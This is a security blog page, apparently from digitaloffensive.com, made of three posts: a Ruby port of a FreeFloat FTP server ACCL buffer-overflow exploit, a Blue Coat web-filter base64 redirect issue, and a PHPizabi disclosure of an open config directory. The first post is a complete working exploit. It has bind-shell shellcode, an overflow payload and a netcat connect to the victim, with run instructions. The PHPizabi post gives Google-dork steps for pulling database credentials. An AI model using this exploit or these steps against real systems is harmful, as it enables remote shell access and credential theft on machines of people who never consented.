The original vulnerability was published here: http://www.exploit-db.com/exploits/17550. The FreeFloat FTP server is a free standing executable FTP server requiring no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. Though the trick is not to make it to crash but to gain shell access, Mortis original published the working exploit in python. What we have done here is converted it into a ruby exploit. Why? Simply cause while learning ruby I took it as a challenge to test what I have learned.

Exploiting the vulnerability

To test the actual exploit download the vulnerable software and install it on a Windows XP SP3 machine: http://www.freefloat.com/software/freefloatftpserver.zip. Next on a Linux machine copy the ruby code provided and save it to a file called ftpexploit.rb and chmod it to 777. To run the exploit type in ./ftpexploit.rb and enter the victims IP. If the exploit is successful you will get a windows shell.

The Exploit

#!/usr/bin/ruby

#

#FreeLoat FTP SERVER ACCL BUFFER OVERFlow and remote shell Exploit

#Original Exploit by: Mortis as found on exploit-db.com

#Code redesigned into ruby by genxweb from digitaloffensive.com

###############################################################

###############################################################

require ‘socket’

puts “Enter the IP to Exploit: ”

h0st = gets

victim = h0st.chomp!

#open listener shell on port 4444

sc = “\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2″

padding = “A”*246

sled = “\x90″*20

jmpesp = “\x13\x44\x87\x7c”

sploit = “#{padding}#{jmpesp}#{sled}#{sc}”

s = TCPsocket.new(“#{victim}”,21)

s.recv(1024)

s.puts(“USER test\r\n”)

s.recv(1024)

s.puts(“PASS test\r\n”)

s.recv(1024)

s.puts(“ACCL “+sploit+”\r\n”)

s.close()

puts “#### IF EXPLOIT IS SCUCCESSFUL SHELL WILL OPEN ####”

puts “###################################################”

system(“nc #{victim} 4444″)

How the code works

First we ask the hacker for the victims IP address. Once we have that we remove the trailing new line statement using the chomp command. Now that we have the victims IP we build the packet that will be sent over the socket we open.

The first part of the packet is the padding and sled. This gets us to the point where we can overwrite the memory with our shellcode. The jmpesp variable is the place in memory in big endian format to enter our shellcode. The shellcode is a generic shellcode to open port 4444 on the victim’s machine with a windows command line access.

Once the packet is built we open a connection to the victim on port 21, the standard ftp port. Once the connection is built we send the user: test and password: test. After that we then send the ACCL and exploit packet. If this is successful a shell will spawn on the victims box.

Finally the exploit will then use netcat (nc) to connect to the victims machine so you can interact with the victim.

The Blue Coat web filter is one of the industry’s leading web filtering solutions. It provides the organization the ability to filter where their employee’s, vendors, customers or guests can go online.

The Blue Coat Web filter has an issue where it will display a base64 encoded URL in the following format http://blue_coat_name/?cfru=aHR0cDovL3d3dy5nb29nbGUuY29tLw== when it has an error.

This URL is displayed in the end users browser usually with a message relating to the issue. The encoded URL is the URL that the end user was trying to get to before the error occurred. In the URL above I was trying to access www.google.com.  To verify that we can use any base64 decoder, for this example I used an online version found at http://base64-encoder-online.waraxe.us/ .

All a malicious user would need to carry out an attack would be remote site that is hosting a malicious payload or an attack platform like Metasploit or Core Impact to host the malicious file. The attacker would than use a base64 encoder to encrypt the malicious URL and send the problematic link to the system administrator or any other end user. This attack could lead to a full system compromise depending on the payload and the rights of the user clicking the URL.

The limitation to this vulnerability is that DNS name and or IP of the Blue Coat web appliance will differ for the majority of companies. Though I bet there are at least a few companies out there that have named their Blue Coat web filter “proxy” or “webproxy”. By posting several of these generic names on the internet it may also be able to compromise other remote machines as well.

The question that I have to Blue Coat is why you would provide such functionality. Why don’t  just display the URL in clear text.

Vendor: Notified. I notified the vendor of this issue over three months ago and have not heard back from them regarding this threat. According to their website there has been no patches or core releases released since the ones I have listed below.

Version: PHPizabi 0.848b C1 HFP1 (Alicia)

Hot fixes: 848 Core HotFix Pack 3 0848bC1_HFP3.zip and below

Product Info:

“More than a simple script, dating script, or even just a matchmaker; PHPizabi is a feature rich social networking platform that integrates everything you need to jumpstart your community, dating site, or social networking portal right out of the box. PHPizabi is one of the most reliable, safe, and solid platforms on the market, offering your users features they could only dream of.”

Vulnerability:

In the default configuration and installation of this script the “system” dir is left open allowing indexing. When I discovered that the system dir was open I was able to download the configuration file that contained sensitive information about the site such as the database connection information including username and password.

To exploit

1)      Google: “Powered by PHPizabi”

2)      http://sitename.com/system/

3)      Download file open in editor.

Temp solutions:

1)      Add a .htacess to the system dir that says

a.       Options –Indexes

b.      Note this will not stop the attacker from using wget and http://sitename.com/system/config.inc.php from retrieving the file.

2)      Make sure that the database can only be accessed local.

a.       The host I had permission to test this on had the database open to remote connections.

Vendor should have the file die if trying to access it directly like they do if you try to access a file in the admin directory directly.

Tested on: This has been tested against my site www.xxxxxxxx.com I have done some edits to the code to protect my site and contacted the host about the database settings. Site address has been “X” out to protect it from people trying the attack against it.

Vulnerability Classification: Possible vulnerability in information disclosure and database integrity.

Thanks

Michael LaSalvia

www.digitaloffensive.com